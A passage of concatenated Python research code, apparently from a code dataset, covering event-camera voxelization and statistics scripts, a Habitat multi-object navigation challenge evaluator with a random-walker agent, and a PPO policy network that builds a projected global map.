self.projector = nn.Sequential(nn.Linear(dim, hid_dim, bias=False),
nn.BatchNorm1d(hid_dim),
nn.ReLU(inplace=True), # hidden layer
nn.Linear(hid_dim, dim)) # output layer
def forward(self, x):
return self.projector(x)
```
#### File: real_cnn_model/utils/convert_utils.py
```python
from numpy.lib.shape_base import split
import torch
from math import ceil
"""
Collection of functions for converting (N, 4) event tensor to some other form
"""
def event_to_voxel(event: torch.Tensor, num_bins: int, num_events: int, height: int, width: int):
"""
Convert (N, 4) event tensor into a new tensor of shape (N_e, B, H, W), where B is the number of bins to use,
and N_e = ceil(N / num_events)
Note that event = [x, y, time, polarity]
Args:
event: (N, 4) tensor containing events
num_bins: Number of bins
num_events: Unit number of events to pack to a single voxel batch of (B, H, W)
height: Height of voxel
width: Width of voxel
Returns:
voxel_event: (N_e, B, H, W) tensor containing voxelized events
"""
tgt_event = event.clone().detach()
# Swap x, y for indexing
tgt_event = torch.index_select(tgt_event, 1, torch.LongTensor([1, 0, 2, 3]))
N_e = ceil(tgt_event.shape[0] / num_events)
voxel_event = torch.zeros([N_e, num_bins, height, width])
for idx in range(N_e):
sliced_event = tgt_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
floor_event[:, 3] = sliced_event[:, 3] * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
ceil_event[:, 3] = sliced_event[:, 3] * (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] < num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] < num_bins]
bin_voxel_event = torch.sparse.FloatTensor(new_coords.t(), val, torch.Size([height, width, num_bins])).to_dense()
bin_voxel_event = bin_voxel_event.permute(2, 0, 1)
voxel_event[idx] = bin_voxel_event
return voxel_event
def event_to_spike_tensor(event: torch.Tensor, num_bins: int, num_events: int, height: int, width: int, measure='time'):
"""
Convert (N, 4) event tensor into a new tensor of shape (N_e, 2, B, H, W), where B is the number of bins to use,
and N_e = ceil(N / num_events)
Note that event = [x, y, time, polarity]
Args:
event: (N, 4) tensor containing events
num_bins: Number of bins
num_events: Unit number of events to pack to a single voxel batch of (B, H, W)
height: Height of voxel
width: Width of voxel
Returns:
voxel_event: (N_e, B, H, W) tensor containing voxelized events
"""
assert measure in ['time', 'count', 'polarity', 'polarized_time']
tgt_event = event.clone().detach()
# Swap x, y for indexing
tgt_event = torch.index_select(tgt_event, 1, torch.LongTensor([1, 0, 2, 3]))
pos_event = tgt_event[tgt_event[:, -1] > 0]
neg_event = tgt_event[tgt_event[:, -1] < 0]
N_e = ceil(tgt_event.shape[0] / num_events)
voxel_event = torch.zeros([N_e, 2, num_bins, height, width])
for idx in range(N_e):
# Positive Tensor
sliced_event = pos_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
if measure == 'polarity' or measure == 'count':
floor_event[:, 3] = (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'time' or measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
if measure == 'polarity' or measure == 'count':
ceil_event[:, 3] = (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
elif measure == 'time' or measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] < num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] < num_bins]
bin_voxel_event = torch.sparse.FloatTensor(new_coords.t(), val, torch.Size([height, width, num_bins])).to_dense()
bin_voxel_event = bin_voxel_event.permute(2, 0, 1)
voxel_event[idx, 0] = bin_voxel_event
# Negative Tensor
sliced_event = neg_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
if measure == 'polarity':
floor_event[:, 3] = -(1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'count':
floor_event[:, 3] = (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = -norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
if measure == 'polarity':
ceil_event[:, 3] = -(1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
elif measure == 'count':
ceil_event[:, 3] = (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'time':
norm_time = sliced_event[:, 2] / num_bins
ceil_event[:, 3] = norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = -norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] < num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] < num_bins]
bin_voxel_event = torch.sparse.FloatTensor(new_coords.t(), val, torch.Size([height, width, num_bins])).to_dense()
bin_voxel_event = bin_voxel_event.permute(2, 0, 1)
voxel_event[idx, 1] = bin_voxel_event
return voxel_event
def event_to_voxel_full(event: torch.Tensor, num_bins, height, width, sparse=False):
"""
Convert all the events to single voxel batch of shape (B, H, W)
"""
if sparse:
return event_to_voxel_sparse(event, num_bins, len(event), height, width)
else:
return event_to_voxel(event, num_bins, len(event), height, width).squeeze(0)
def event_to_spike_tensor_full(event: torch.Tensor, num_bins, height, width, measure='time'):
"""
Convert all the events to single event spike tensor of shape (2, B, H, W)
"""
return event_to_spike_tensor(event, num_bins, len(event), height, width, measure)
def event_to_count_voxel_full(event: torch.Tensor, num_bins, height, width):
"""
Convert all the events to single event voxel of shape (B, H, W)
"""
split_length = [event.shape[0] // num_bins] * num_bins if event.shape[0] % num_bins == 0 \
else [event.shape[0] // num_bins] * (num_bins - 1) + [event.shape[0] // num_bins + event.shape[0] % num_bins]
split_event = torch.split(event, split_length, dim=0)
voxel_event = torch.zeros([num_bins, height, width])
for idx, evt in enumerate(split_event):
voxel_event[idx] = torch.bincount(evt[:, 0].long() + evt[:, 1].long() * width, minlength=height * width).reshape(height, width)
return voxel_event, split_length
def event_to_voxel_sparse(event: torch.Tensor, num_bins: int, num_events: int, height: int, width: int):
"""
Convert (N, 4) event tensor into a new tensor of shape (N_e, B, H, W), where B is the number of bins to use,
and N_e = ceil(N / num_events). This methods returns the coordinates and values of the resulting tensor, instead
of the tensor itself, for further use in sparse convolution.
Note that event = [x, y, time, polarity]
Args:
event: (N, 4) tensor containing events
num_bins: Number of bins
num_events: Unit number of events to pack to a single voxel batch of (B, H, W)
height: Height of voxel
width: Width of voxel
Returns:
tot_coords: (N_tot, 4) tensor containing coordinates of the resulting tensor
tot_vals: (N_tot, ) tensor containing values of the resulting tensor
"""
tgt_event = event.clone().detach()
# Swap x, y for indexing
tgt_event = torch.index_select(tgt_event, 1, torch.LongTensor([1, 0, 2, 3]))
N_e = ceil(tgt_event.shape[0] / num_events)
tot_coords = []
tot_vals = []
for idx in range(N_e):
sliced_event = tgt_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
floor_event[:, 3] = sliced_event[:, 3] * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
ceil_event[:, 3] = sliced_event[:, 3] * (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] != num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] != num_bins]
tot_coords.append(new_coords)
tot_vals.append(val)
tot_coords = torch.cat(tot_coords, dim=0)
tot_vals = torch.cat(tot_vals, dim=0)
return tot_coords, tot_vals
if __name__ == '__main__':
x = torch.load('/Datasets/imagenet_train_1278567.pt')
z = event_to_voxel_full(x, 10, 224, 224, sparse=True)
breakpoint()
```
#### File: real_cnn_model/utils/train_logistic.py
```python
import sys
import tqdm
import numpy as np
from pathlib import Path
import random
import torch
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.ensemble import RandomForestClassifier
file_list = sys.argv[1]
pred_file = sys.argv[2]
label_file = sys.argv[3]
SENSOR_H = 480
SENSOR_W = 640
IMAGE_H = 224
IMAGE_W = 224
stat_list = ['speed', 'proj_cnt', 'var', 'grad']
def load_event(event_path):
# Returns time-shifted numpy array event from event_path
event = np.load(event_path)
event = np.vstack([event['x_pos'], event['y_pos'], event['timestamp'], event['polarity']]).T
# Account for non-zero minimum time
if event[:, 2].min() != 0:
event[:, 2] -= event[:, 2].min()
event = event.astype(np.float)
# Account for int-type timestamp
event[:, 2] /= 1000000
# Account for zero polarity
if event[:, 3].min() >= -0.5:
event[:, 3][event[:, 3] <= 0.5] = -1
event[:, 0] *= (IMAGE_W / SENSOR_W)
event[:, 1] *= (IMAGE_H / SENSOR_H)
return event
def get_speed(event_path):
event = load_event(event_path)
return len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
def get_bundle_speed(event_path):
event = load_event(event_path)
event = event[:20000]
return len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
def get_stats(event_path, idx=None):
event = torch.from_numpy(load_event(event_path))
length = 20000
if idx is not None:
coords = event[idx: idx + length, :2].long()
else:
coords = event[:, :2].long()
event_image = torch.zeros([IMAGE_H, IMAGE_W])
event_image[(coords[:, 1], coords[:, 0])] = 1.0
value_list = []
if 'speed' in stat_list:
length = 20000
avg_speed = 0.0
num_samples = 10
if idx is not None:
event = event[idx: idx + length]
avg_speed = len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
else:
if len(event) > length:
for _ in range(num_samples):
start = random.choice(range(len(event) - length + 1))
sample_event = event[start: start + length]
avg_speed += len(sample_event) / ((sample_event[-1, 2] - sample_event[0, 2]) * 1000000.)
avg_speed = avg_speed / num_samples
else:
avg_speed += len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
value_list.append(avg_speed)
if 'proj_cnt' in stat_list:
proj_cnt = torch.mean(event_image).item()
value_list.append(proj_cnt)
if 'grad' in stat_list:
gy, gx = np.gradient(event_image.numpy())
gnorm = np.sqrt(gx**2 + gy**2)
sharpness = np.average(gnorm)
value_list.append(sharpness)
if 'var' in stat_list:
var = torch.var(event_image)
value_list.append(var)
return value_list
if __name__ == '__main__':
if '.pt' in file_list:
result_tensor = torch.load(file_list)
else:
file_list = open(file_list, 'r').readlines()
idx_list = [int(s.strip().split(':')[1]) for s in file_list]
file_list = [(Path(s.strip().split(':')[0])) for s in file_list]
result_list = [get_stats(event_path, idx) for event_path, idx in tqdm.tqdm(zip(file_list, idx_list), total=len(file_list))]
result_tensor = torch.tensor(result_list).numpy()
"""
preds = torch.load(pred_file).cpu().numpy()
labels = torch.load(label_file).cpu().numpy()
inference_result = (preds.argmax(-1) == labels)
clf = LogisticRegression(random_state=0, verbose=2, max_iter=10000).fit(result_tensor, inference_result)
# clf = MLPClassifier(alpha=1, max_iter=1000, verbose=2).fit(result_tensor, inference_result)
# clf = RandomForestClassifier(max_depth=5, n_estimators=10, verbose=2).fit(result_tensor, inference_result)
print("Accuracy: ", clf.score(result_tensor, inference_result))
# print("Weights: ", clf.coef_, "Bias: ", clf.intercept_)
# torch.save(result_tensor, Path(sys.argv[1]).parent / (Path(sys.argv[1]).stem + "_speed.pt"))
"""
# Regression
preds = torch.load(pred_file).cpu()
preds = torch.softmax(preds, dim=-1).numpy()
labels = torch.load(label_file).cpu().numpy()
model_score = preds[torch.arange(50000).reshape(-1, 1), labels.reshape(-1, 1)].squeeze()
reg = MLPRegressor(random_state=1, max_iter=500, verbose=2, solver='adam', learning_rate_init=0.0003).fit(result_tensor, model_score)
print(reg.score(result_tensor, model_score))
```
#### File: real_cnn_model/utils/warp_events.py
```python
import sys
import tqdm
import numpy as np
from pathlib import Path
import random
import torch
from scipy.optimize import minimize
import matplotlib.pyplot as plt
file_list = sys.argv[1]
SENSOR_H = 480
SENSOR_W = 640
IMAGE_H = 224
IMAGE_W = 224
VISUALIZE = True
LENGTH = 50000
START_IDX = 0
OBJECTIVE = 'gradient'
def load_event(event_path):
# Returns time-shifted numpy array event from event_path
event = np.load(event_path)['event_data']
event = np.vstack([event['x'], event['y'], event['t'], event['p'].astype(np.uint8)]).T
event = event.astype(np.float)
# Account for non-zero minimum time
if event[:, 2].min() != 0:
event[:, 2] -= event[:, 2].min()
# Account for int-type timestamp
# event[:, 2] /= 1000000
# Account for zero polarity
if event[:, 3].min() >= -0.5:
event[:, 3][event[:, 3] <= 0.5] = -1
event[:, 0] *= (IMAGE_W / SENSOR_W)
event[:, 1] *= (IMAGE_H / SENSOR_H)
return event
def display_event(event):
event_image = np.zeros([IMAGE_H, IMAGE_W])
coords = event[:, :2].astype(np.int32)
event_image[(coords[:, 1], coords[:, 0])] = 1.0
plt.imshow(event_image)
plt.show()
def warp_event(event_path):
event = load_event(event_path)
speed = np.zeros(2)
display_event(event)
def tgt_func(x):
tgt_event = np.array(event[START_IDX:START_IDX + LENGTH])
tgt_event[:, 0] = tgt_event[:, 0] + x[0] * (tgt_event[START_IDX, 2] - tgt_event[:, 2])
tgt_event[:, 1] = tgt_event[:, 1] + x[1] * (tgt_event[START_IDX, 2] - tgt_event[:, 2])
coords = tgt_event[:, :2].astype(np.int32)
coords[:, 0] = np.clip(coords[:, 0], 0, IMAGE_W - 1)
coords[:, 1] = np.clip(coords[:, 1], 0, IMAGE_H - 1)
event_image = np.zeros([IMAGE_H, IMAGE_W])
event_image[(coords[:, 1], coords[:, 0])] = 1.0
plt.imshow(event_image)
plt.show()
obj_value = 0.0
if OBJECTIVE == 'proj_cnt':
obj_value = np.average(event_image)
elif OBJECTIVE == 'gradient':
gy, gx = np.gradient(event_image)
gnorm = np.sqrt(gx**2 + gy**2)
obj_value = -np.average(gnorm)
elif OBJECTIVE == 'variance':
obj_value = -np.var(event_image)
print(obj_value)
return obj_value
result = minimize(tgt_func, speed, bounds=[(-1.0 / 1000, 1.0 / 1000), (-1.0 / 1000, 1.0 / 1000)])
speed = result.x
event[:, 0] = event[:, 0] + speed[0] * (event[START_IDX, 2] - event[:, 2])
event[:, 1] = event[:, 1] + speed[1] * (event[START_IDX, 2] - event[:, 2])
event[:, 0] = np.clip(event[:, 0], 0, IMAGE_W - 1)
event[:, 1] = np.clip(event[:, 1], 0, IMAGE_H - 1)
display_event(event)
import pdb; pdb.set_trace()
return result
def save_event(event_tensor, save_path):
pass
if __name__ == '__main__':
file_list = open(file_list, 'r').readlines()
file_list = [Path(s.strip()) for s in file_list]
for event_path in tqdm.tqdm(file_list):
result_event = warp_event(event_path)
save_path = 'tmp'
save_event(result_event, save_path)
``` |
{
"source": "82magnolia/multion-challenge",
"score": 3
} |
#### File: 82magnolia/multion-challenge/evaluate.py
```python
import argparse
import os
import random
# import sys
# sys.path.insert(0, "")
import numpy as np
import habitat
from habitat.core.challenge import Challenge
class RandomWalker(habitat.Agent):
def __init__(self):
self._POSSIBLE_ACTIONS = np.array([0,1,2,3])
def reset(self):
pass
def act(self, observations):
return {"action": np.random.choice(self._POSSIBLE_ACTIONS)}
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--phase", type=str, required=False, choices=["dev", "standard", "challenge"]
)
args = parser.parse_args()
phase = args.phase
agent = RandomWalker()
challenge = Challenge(phase = phase)
challenge.submit(agent)
if __name__ == "__main__":
main()
``` |
{
"source": "82magnolia/SGoLAM",
"score": 3
} |
#### File: SGoLAM/agents/example.py
```python
from random import Random
import numpy as np
import habitat
"""
In order to use evaluate.py, please implement the following:
1. A walker that inherits habitat.Agent.
2. Walker must have a reset() and act() method.
3. get_agent function that returns a walker instance with the same function signature as below.
"""
class ExampleWalker(habitat.Agent):
def __init__(self):
self._POSSIBLE_ACTIONS = np.array([0,1,2,3])
def reset(self):
pass
def act(self, observations):
return {"action": np.random.choice(self._POSSIBLE_ACTIONS)}
def get_agent(exp_config, challenge, checkpoint_path=None):
return ExampleWalker()
```
#### File: 82magnolia/SGoLAM/evaluate.py
```python
import agents
import argparse
from habitat.core.challenge import Challenge
import importlib
from submit_args import fill_args
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--phase", type=str, required=False, choices=["dev", "standard", "challenge", "video"]
)
parser.add_argument(
"--agent_module",
required=False,
type=str,
default="example",
help="agent module name",
)
parser.add_argument(
"--exp_config", type=str, required=False, help="Config within habitat baselines"
)
parser.add_argument(
"--checkpoint_path", type=str, required=False, help="Path to checkpoint"
)
parser.add_argument(
'--num_episodes', type=int, required=False, default=None ,help="Number of episodes to evaluate. Only works in dev mode."
)
parser.add_argument(
"--no_fill", action='store_true', required=False, help="If Set, skips fill_args"
)
parser.add_argument(
"--external", action='store_true', required=False, help="If Set, agents are loaded from extern_agents folder"
)
parser.add_argument(
"--video_dir", type=str, default=None, help="Path where videos will be logged"
)
args = parser.parse_args()
if not args.no_fill:
args = fill_args(args)
phase = args.phase
challenge = Challenge(phase = phase)
if args.phase is None or args.phase == "dev" or args.phase == "video":
if args.num_episodes is not None:
challenge.num_episodes = args.num_episodes
if args.external:
walker = importlib.import_module(f'extern_agents.{args.agent_module}')
else:
walker = importlib.import_module(f'agents.{args.agent_module}')
agent = walker.get_agent(args.exp_config, challenge, args.checkpoint_path)
if args.video_dir is not None:
from agents.video_walker import VideoWalker
args.phase = "video"
agent = VideoWalker(agent, args.video_dir)
challenge.submit(agent)
if __name__ == "__main__":
main()
```
#### File: rl/ppo/policy.py
```python
import abc
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from habitat_baselines.common.utils import CategoricalNet, Flatten, to_grid
from habitat_baselines.rl.models.projection import Projection, RotateTensor, get_grid
from habitat_baselines.rl.models.rnn_state_encoder import RNNStateEncoder
from habitat_baselines.rl.models.simple_cnn import RGBCNNNonOracle, RGBCNNOracle, MapCNN
from habitat_baselines.rl.models.projection import Projection
class PolicyNonOracle(nn.Module):
def __init__(self, net, dim_actions):
super().__init__()
self.net = net
self.dim_actions = dim_actions
self.action_distribution = CategoricalNet(
self.net.output_size, self.dim_actions
)
self.critic = CriticHead(self.net.output_size)
def forward(self, *x):
raise NotImplementedError
def act(
self,
observations,
rnn_hidden_states,
global_map,
prev_actions,
masks,
deterministic=False,
):
features, rnn_hidden_states, global_map = self.net(
observations, rnn_hidden_states, global_map, prev_actions, masks
)
distribution = self.action_distribution(features)
value = self.critic(features)
if deterministic:
action = distribution.mode()
else:
action = distribution.sample()
action_log_probs = distribution.log_probs(action)
return value, action, action_log_probs, rnn_hidden_states, global_map
def get_value(self, observations, rnn_hidden_states, global_map, prev_actions, masks):
features, _, _ = self.net(
observations, rnn_hidden_states, global_map, prev_actions, masks
)
return self.critic(features)
def evaluate_actions(
self, observations, rnn_hidden_states, global_map, prev_actions, masks, action
):
features, rnn_hidden_states, global_map = self.net(
observations, rnn_hidden_states, global_map, prev_actions, masks, ev=1
)
distribution = self.action_distribution(features)
value = self.critic(features)
action_log_probs = distribution.log_probs(action)
distribution_entropy = distribution.entropy().mean()
return value, action_log_probs, distribution_entropy, rnn_hidden_states
class PolicyOracle(nn.Module):
def __init__(self, net, dim_actions):
super().__init__()
self.net = net
self.dim_actions = dim_actions
self.action_distribution = CategoricalNet(
self.net.output_size, self.dim_actions
)
self.critic = CriticHead(self.net.output_size)
def forward(self, *x):
raise NotImplementedError
def act(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
deterministic=False,
):
features, rnn_hidden_states = self.net(
observations, rnn_hidden_states, prev_actions, masks
)
distribution = self.action_distribution(features)
value = self.critic(features)
if deterministic:
action = distribution.mode()
else:
action = distribution.sample()
action_log_probs = distribution.log_probs(action)
return value, action, action_log_probs, rnn_hidden_states
def get_value(self, observations, rnn_hidden_states, prev_actions, masks):
features, _ = self.net(
observations, rnn_hidden_states, prev_actions, masks
)
return self.critic(features)
def evaluate_actions(
self, observations, rnn_hidden_states, prev_actions, masks, action
):
features, rnn_hidden_states = self.net(
observations, rnn_hidden_states, prev_actions, masks
)
distribution = self.action_distribution(features)
value = self.critic(features)
action_log_probs = distribution.log_probs(action)
distribution_entropy = distribution.entropy().mean()
return value, action_log_probs, distribution_entropy, rnn_hidden_states
class CriticHead(nn.Module):
def __init__(self, input_size):
super().__init__()
self.fc = nn.Linear(input_size, 1)
nn.init.orthogonal_(self.fc.weight)
nn.init.constant_(self.fc.bias, 0)
def forward(self, x):
return self.fc(x)
class BaselinePolicyNonOracle(PolicyNonOracle):
def __init__(
self,
batch_size,
observation_space,
action_space,
goal_sensor_uuid,
device,
object_category_embedding_size,
previous_action_embedding_size,
use_previous_action,
egocentric_map_size,
global_map_size,
global_map_depth,
coordinate_min,
coordinate_max,
hidden_size=512,
):
super().__init__(
BaselineNetNonOracle(
batch_size,
observation_space=observation_space,
hidden_size=hidden_size,
goal_sensor_uuid=goal_sensor_uuid,
device=device,
object_category_embedding_size=object_category_embedding_size,
previous_action_embedding_size=previous_action_embedding_size,
use_previous_action=use_previous_action,
egocentric_map_size=egocentric_map_size,
global_map_size=global_map_size,
global_map_depth=global_map_depth,
coordinate_min=coordinate_min,
coordinate_max=coordinate_max,
),
action_space.n,
)
class BaselinePolicyOracle(PolicyOracle):
def __init__(
self,
agent_type,
observation_space,
action_space,
goal_sensor_uuid,
device,
object_category_embedding_size,
previous_action_embedding_size,
use_previous_action,
hidden_size=512,
):
super().__init__(
BaselineNetOracle(
agent_type,
observation_space=observation_space,
hidden_size=hidden_size,
goal_sensor_uuid=goal_sensor_uuid,
device=device,
object_category_embedding_size=object_category_embedding_size,
previous_action_embedding_size=previous_action_embedding_size,
use_previous_action=use_previous_action,
),
action_space.n,
)
class Net(nn.Module, metaclass=abc.ABCMeta):
@abc.abstractmethod
def forward(self, observations, rnn_hidden_states, global_map, prev_actions):
pass
@property
@abc.abstractmethod
def output_size(self):
pass
@property
@abc.abstractmethod
def num_recurrent_layers(self):
pass
@property
@abc.abstractmethod
def is_blind(self):
pass
class BaselineNetNonOracle(Net):
r"""Network which passes the input image through CNN and concatenates
goal vector with CNN's output and passes that through RNN.
"""
def __init__(self, batch_size, observation_space, hidden_size, goal_sensor_uuid, device,
object_category_embedding_size, previous_action_embedding_size, use_previous_action,
egocentric_map_size, global_map_size, global_map_depth, coordinate_min, coordinate_max
):
super().__init__()
self.goal_sensor_uuid = goal_sensor_uuid
self._n_input_goal = observation_space.spaces[
self.goal_sensor_uuid
].shape[0]
self._hidden_size = hidden_size
self.device = device
self.use_previous_action = use_previous_action
self.egocentric_map_size = egocentric_map_size
self.global_map_size = global_map_size
self.global_map_depth = global_map_depth
self.visual_encoder = RGBCNNNonOracle(observation_space, hidden_size)
self.map_encoder = MapCNN(51, 256, "non-oracle")
self.projection = Projection(egocentric_map_size, global_map_size,
device, coordinate_min, coordinate_max
)
self.to_grid = to_grid(global_map_size, coordinate_min, coordinate_max)
self.rotate_tensor = RotateTensor(device)
self.image_features_linear = nn.Linear(32 * 28 * 28, 512)
self.flatten = Flatten()
if self.use_previous_action:
self.state_encoder = RNNStateEncoder(
self._hidden_size + 256 + object_category_embedding_size +
previous_action_embedding_size, self._hidden_size,
)
else:
self.state_encoder = RNNStateEncoder(
(0 if self.is_blind else self._hidden_size) + object_category_embedding_size,
self._hidden_size, #Replace 2 by number of target categories later
)
self.goal_embedding = nn.Embedding(8, object_category_embedding_size)
self.action_embedding = nn.Embedding(4, previous_action_embedding_size)
self.full_global_map = torch.zeros(
batch_size,
global_map_size,
global_map_size,
global_map_depth,
device=self.device,
)
self.train()
@property
def output_size(self):
return self._hidden_size
@property
def is_blind(self):
return self.visual_encoder.is_blind
@property
def num_recurrent_layers(self):
return self.state_encoder.num_recurrent_layers
def get_target_encoding(self, observations):
return observations[self.goal_sensor_uuid]
def forward(self, observations, rnn_hidden_states, global_map, prev_actions, masks, ev=0):
target_encoding = self.get_target_encoding(observations)
goal_embed = self.goal_embedding((target_encoding).type(torch.LongTensor).to(self.device)).squeeze(1)
if not self.is_blind:
perception_embed = self.visual_encoder(observations)
# interpolated_perception_embed = F.interpolate(perception_embed, scale_factor=256./28., mode='bilinear')
projection = self.projection.forward(perception_embed, observations['depth'] * 10, -(observations["compass"]))
perception_embed = self.image_features_linear(self.flatten(perception_embed))
grid_x, grid_y = self.to_grid.get_grid_coords(observations['gps'])
# grid_x_coord, grid_y_coord = grid_x.type(torch.uint8), grid_y.type(torch.uint8)
bs = global_map.shape[0]
##forward pass specific
if ev == 0:
self.full_global_map[:bs, :, :, :] = self.full_global_map[:bs, :, :, :] * masks.unsqueeze(1).unsqueeze(1)
if bs != 18:
self.full_global_map[bs:, :, :, :] = self.full_global_map[bs:, :, :, :] * 0
if torch.cuda.is_available():
with torch.cuda.device(self.device):
agent_view = torch.cuda.FloatTensor(bs, self.global_map_depth, self.global_map_size, self.global_map_size).fill_(0)
else:
agent_view = torch.FloatTensor(bs, self.global_map_depth, self.global_map_size, self.global_map_size).to(self.device).fill_(0)
agent_view[:, :,
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2),
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2)
] = projection
st_pose = torch.cat(
[-(grid_y.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
-(grid_x.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
observations['compass']],
dim=1
)
rot_mat, trans_mat = get_grid(st_pose, agent_view.size(), self.device)
rotated = F.grid_sample(agent_view, rot_mat)
translated = F.grid_sample(rotated, trans_mat)
self.full_global_map[:bs, :, :, :] = torch.max(self.full_global_map[:bs, :, :, :], translated.permute(0, 2, 3, 1))
st_pose_retrieval = torch.cat(
[
(grid_y.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
(grid_x.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
torch.zeros_like(observations['compass'])
],
dim=1
)
_, trans_mat_retrieval = get_grid(st_pose_retrieval, agent_view.size(), self.device)
translated_retrieval = F.grid_sample(self.full_global_map[:bs, :, :, :].permute(0, 3, 1, 2), trans_mat_retrieval)
translated_retrieval = translated_retrieval[:,:,
self.global_map_size//2-math.floor(51/2):self.global_map_size//2+math.ceil(51/2),
self.global_map_size//2-math.floor(51/2):self.global_map_size//2+math.ceil(51/2)
]
final_retrieval = self.rotate_tensor.forward(translated_retrieval, observations["compass"])
global_map_embed = self.map_encoder(final_retrieval.permute(0, 2, 3, 1))
if self.use_previous_action:
action_embedding = self.action_embedding(prev_actions).squeeze(1)
x = torch.cat((perception_embed, global_map_embed, goal_embed, action_embedding), dim = 1)
x, rnn_hidden_states = self.state_encoder(x, rnn_hidden_states, masks)
return x, rnn_hidden_states, final_retrieval.permute(0, 2, 3, 1)
else:
global_map = global_map * masks.unsqueeze(1).unsqueeze(1) ##verify
with torch.cuda.device(1):
agent_view = torch.cuda.FloatTensor(bs, self.global_map_depth, 51, 51).fill_(0)
agent_view[:, :,
51//2 - math.floor(self.egocentric_map_size/2):51//2 + math.ceil(self.egocentric_map_size/2),
51//2 - math.floor(self.egocentric_map_size/2):51//2 + math.ceil(self.egocentric_map_size/2)
] = projection
final_retrieval = torch.max(global_map, agent_view.permute(0, 2, 3, 1))
global_map_embed = self.map_encoder(final_retrieval)
if self.use_previous_action:
action_embedding = self.action_embedding(prev_actions).squeeze(1)
x = torch.cat((perception_embed, global_map_embed, goal_embed, action_embedding), dim = 1)
x, rnn_hidden_states = self.state_encoder(x, rnn_hidden_states, masks)
return x, rnn_hidden_states, final_retrieval.permute(0, 2, 3, 1)
class BaselineNetOracle(Net):
r"""Network which passes the input image through CNN and concatenates
